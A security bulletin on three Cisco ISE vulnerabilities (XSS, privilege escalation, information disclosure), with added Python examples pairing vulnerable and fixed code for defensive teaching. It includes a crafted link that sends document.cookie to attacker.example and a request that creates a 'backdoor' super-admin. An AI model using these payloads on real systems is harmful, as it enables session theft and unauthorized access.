SB2019012408 - Multiple vulnerabilities in Cisco Identity Services Engine
Published: January 24, 2019

Security Bulletin ID: SB2019012408
Severity: Low
Patch available: YES
Number of vulnerabilities: 3
Exploitation vector: Remote access
Highest impact: Data manipulation

Breakdown by Severity

Low: 100% (3 of 3)

Description

This security bulletin contains information about 3 security vulnerabilities.


1) Cross-site scripting (CVE-ID: CVE-2018-15455)

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data. A remote attacker can trick the victim into following a specially crafted link and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change the appearance of the web page, and perform phishing and drive-by-download attacks.
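The bulletin does not name the affected page or parameter, so the following is an added illustration of the flaw class rather than ISE code: a hypothetical search page that reflects a query parameter, shown once without output encoding (the "insufficient sanitization" the bulletin describes) and once with HTML escaping, plus a small check a tester can run against a response to see whether a marker is reflected raw. The URL, parameter name and markup are assumptions.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Assumed page template: the reflected value lands in an HTML text node.
TEMPLATE = "<html><body><h1>Results for: {term}</h1></body></html>"


def render_vulnerable(term: str) -> str:
    """Reflects user input verbatim: insufficient sanitization."""
    return TEMPLATE.format(term=term)


def render_fixed(term: str) -> str:
    """Encodes the value for the HTML text-node context before reflecting it."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def term_from_url(url: str) -> str:
    """Extract the reflected 'q' parameter from a crafted link (assumed name)."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def reflects_unescaped(response_html: str, marker: str) -> bool:
    """Reflected-XSS probe: True if the marker's raw angle-bracket form survives
    in the response (html.escape would have turned '<' into '&lt;')."""
    return marker in response_html


# Constructed crafted link: the query value decodes to
# <script>document.location='https://attacker.example/?'+document.cookie</script>
CRAFTED_LINK = (
    "https://ise.example/admin/search?q="
    "%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F%3F%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)

if __name__ == "__main__":
    term = term_from_url(CRAFTED_LINK)
    print("vulnerable reflects script:", reflects_unescaped(render_vulnerable(term), "<script>"))
    print("fixed reflects script:     ", reflects_unescaped(render_fixed(term), "<script>"))
```

The probe is deliberately simple: it only tells you whether the input came back unencoded in an HTML text-node context. Values reflected inside attributes, URLs or inline JavaScript need context-specific encoding and a context-specific check.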


2) Privilege escalation (CVE-ID: CVE-2018-15459)

The vulnerability allows a remote authenticated attacker to gain elevated privileges.

The vulnerability exists due to improper controls on certain pages in the web interface. An attacker who authenticates to the device with an administrator account and sends a crafted HTTP request can create additional Admin accounts with different user roles, then use these accounts to perform actions within their scope.
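As an added illustration (not ISE code; the role names, endpoint and request format are assumptions), here is the authorization gap the bulletin describes, modelled as a small request handler. The vulnerable version only confirms that the caller holds some admin role, so a crafted POST to the account-creation path can assign any role. The fixed version enforces, on the server side and on every account-creation path, that a new account may not outrank the caller.

```python
import json
from dataclasses import dataclass

# Assumed role hierarchy for an admin portal (higher rank = more privilege).
ROLE_RANK = {"helpdesk-admin": 1, "policy-admin": 2, "super-admin": 3}

ACCOUNTS_PATH = "/admin/api/accounts"  # assumed endpoint


@dataclass
class Request:
    session_role: str  # role of the authenticated admin sending the request
    path: str
    body: str          # JSON document


def _parse_new_account(body: str):
    data = json.loads(body)
    return data["username"], data["role"]


def handle_vulnerable(req: Request, accounts: dict):
    """Improper control: only checks that the caller is *an* admin."""
    if req.session_role not in ROLE_RANK:
        return 403, "forbidden"
    if req.path == ACCOUNTS_PATH:
        username, role = _parse_new_account(req.body)
        accounts[username] = role
        return 201, f"created {username} as {role}"
    return 404, "not found"


def handle_fixed(req: Request, accounts: dict):
    """Bound the assignable role by the caller's own role."""
    if req.session_role not in ROLE_RANK:
        return 403, "forbidden"
    if req.path == ACCOUNTS_PATH:
        username, role = _parse_new_account(req.body)
        if role not in ROLE_RANK:
            return 400, "unknown role"
        if ROLE_RANK[role] > ROLE_RANK[req.session_role]:
            return 403, f"{req.session_role} may not create a {role} account"
        accounts[username] = role
        return 201, f"created {username} as {role}"
    return 404, "not found"


# Constructed crafted request: a helpdesk-level admin tries to mint a super-admin.
CRAFTED = Request(
    session_role="helpdesk-admin",
    path=ACCOUNTS_PATH,
    body=json.dumps({"username": "backdoor", "role": "super-admin"}),
)

if __name__ == "__main__":
    for handler in (handle_vulnerable, handle_fixed):
        store = {}
        print(handler.__name__, handler(CRAFTED, store), store)
```

The check belongs in the handler for the creation path itself, not only in the page that normally renders the form: a crafted request bypasses whatever the UI hides.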


3) Information disclosure (CVE-ID: CVE-2018-0187)

The vulnerability allows a remote authenticated attacker to obtain potentially sensitive information.

The vulnerability exists in the Admin portal due to improper handling of confidential information. A remote authenticated attacker can log into the web interface and obtain confidential information about privileged accounts, which can then be used to impersonate or negatively impact the privileged account on the affected system.


Remediation

Install the update from the vendor's website.